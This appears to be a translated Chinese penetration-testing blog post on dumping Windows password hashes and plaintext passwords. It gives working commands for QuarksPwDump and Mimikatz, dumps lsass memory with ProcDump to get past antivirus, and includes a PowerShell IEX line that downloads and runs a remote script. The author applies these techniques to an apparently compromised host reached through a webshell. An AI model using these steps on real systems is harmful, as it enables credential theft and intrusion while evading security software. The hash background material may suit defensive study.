First, some background on Windows password hashes (the following section is adapted from material found online):
An introduction to Windows password hashes:
The early SMB protocol transmitted passwords over the network in plaintext. The "LAN Manager challenge/response" authentication mechanism that followed, known as LM, is so simple that it is easily cracked, so Microsoft introduced the Windows NT challenge/response mechanism, called NTLM. Today there are the newer NTLMv2 and the Kerberos authentication system. A password that Windows has transformed for storage is called a hash (Chinese: 哈希). By default a Windows account's stored password hash consists of two parts: the first is the LM hash, the second is the NT hash (often written NTLM hash).
Compared with the LM hash algorithm, the NT hash is case-sensitive in the plaintext password, does not let you tell from the hash whether the password is shorter than 8 bytes, and does away with the magic constant "KGS!@#$%". MD4 is a true one-way hash function, so brute-forcing the plaintext from it is considerably harder. The problem is that Microsoft, while insisting the NT hash is strong, kept the LM hash alongside it by default for backward compatibility. That means the extra strength of the NT hash adds nothing to security and actually undermines it: an attacker first exploits the weakness of the LM hash to brute-force a case-insensitive version of the plaintext, then uses the NT hash to recover the correct case.
The hash format on a Windows system is username:RID:LM-hash:NT-hash:::, for example:
ADMINISTRATOR:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
which means:
User name: Administrator
RID: 500
LM hash: C8825DB10F2590EAAAD3B435B51404EE
NT hash: 683020925C5D8569C23AA724774CE6CC
Note that the second half of this LM hash, AAD3B435B51404EE, is the LM hash of an empty 7-byte half: it already tells you the password is at most 7 characters long.
If you have a user's hash, you can submit C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC to an online hash lookup site.
I normally use QuarksPwDump v0.2b to dump password hashes from the whole Windows family. On Windows Server 2003 it grabs them every time, and submitting the hash to http://www.objectif-securite.ch/en/ophcrack.php cracks it in seconds. The problem is that the hashes I dumped on Windows Server 2008 and Windows Server 2012 looked odd, even though the tool's description says both versions are supported. I'll walk through it on a virtual machine; the VM currently running is Windows Server 2012, so let's use that for the demonstration.
The QuarksPwDump command to dump the hashes is as follows (see the tool's documentation for the other options):
QuarksPwDump.exe -dhl
Looking at the screenshot:
It appears to have dumped the system's hashes. Going by the Windows hash background above:
The LM hash is AAD3B435B51404EEAAD3B435B51404EE
The NT hash is CE770E312D64AE0933D455B994E9C97D
Now I take the whole hash to the online cracker, with this result:
It cannot be cracked. That is not right; how embarrassing.
The LM value AAD3B435B51404EEAAD3B435B51404EE is the LM hash of an empty password: Windows Vista/Server 2008 and later do not store LM hashes by default, so there is nothing for an LM rainbow table to crack and only the NT hash is of any use here.
Let's bring out the other password-dumping tool, Mimikatz, try it and compare with the result above. The commands are as follows:
First enter:
privilege::debug
Then enter:
sekurlsa::logonpasswords
The results in the screenshot are as follows:
As you can see, the LM hash that Mimikatz dumps differs from the one QuarksPwDump dumps, and Mimikatz also extracts the system password directly; the NT hash from the two tools is the same. The difference is where the data comes from: QuarksPwDump reads the stored hashes from the SAM, while Mimikatz reads the credentials of logged-on users from the memory of the LSASS process, where on these Windows versions the WDigest provider still caches the plaintext password.
Now a few words about the approach. The penetration-testing mindset is something I only picked up yesterday; penetration testing really is a long process of accumulating experience. First the scenario: I already had a China Chopper webshell connected to the target host, but the system had 360 Antivirus and 360 Safeguard installed by default, and the Mimikatz and QuarksPwDump I uploaded were both flagged and deleted. In other words, the conventional approach of running these two tools on the target to get its password hashes was not going to work. Instead, we can first dump the memory of the target's lsass process to a file, then process that file with Mimikatz on our own machine to obtain the target's hashes and passwords. The demonstration again uses the Windows Server 2012 virtual machine.
ProcDump can be downloaded from Microsoft's official website (Sysinternals); the latest version at the time of writing is v7.01. Being a signed Microsoft tool it is not flagged or deleted by the antivirus software (although opening a handle to lsass.exe is itself something an endpoint monitor can alert on).
The command is as follows:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
As shown below:
Next we demonstrate using Mimikatz locally to extract the credentials from the dump (use a Mimikatz build of the same architecture, x86 or x64, as the system the dump was taken from):
First enter:
mimikatz.exe "sekurlsa::minidump lsass.dmp"
Then enter:
sekurlsa::logonpasswords
The results are shown below:
As you can see, the system password can be obtained offline, which bypasses the antivirus on the target.
The cloud knowledge base also gives a PowerShell command that does the same job as ProcDump. The command is as follows:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump
On the Windows Server 2012 virtual machine it failed at first, for no obvious reason:
Trying again, it succeeded. Embarrassing:
On the Windows Server 2008 virtual machine, the attempt is shown here:
After cracking, the result is as shown:
I tried it on the compromised host and found it works, although the Chopper virtual terminal shows an error even though the PowerShell code has actually executed successfully. Overall, though, ProcDump still feels more convenient.
Mimikatz is also integrated into Metasploit; for a tutorial see Http://www.offensive-security.com/metasploit-unleashed/Mimikatz
That's it for now. These notes are shared for penetration-testing study and exchange; please do not use them for illegal purposes.
On dumping passwords across the Windows family